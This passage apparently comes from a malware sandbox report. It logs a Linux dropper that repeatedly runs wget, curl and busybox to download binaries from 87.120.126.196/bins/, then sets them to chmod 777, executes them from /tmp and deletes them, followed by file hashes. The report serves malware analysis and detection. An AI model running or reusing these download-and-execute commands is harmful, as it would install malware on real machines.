/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1630
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:1633
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1636
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:1639
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1642
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:1643
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:1644
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:1645
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1646
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Writes file to tmp directory
PID:1647
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1648
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:1649
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:1650
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:1651
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1652
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Writes file to tmp directory
PID:1653
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1654
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:1655
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:1656
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:1657
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97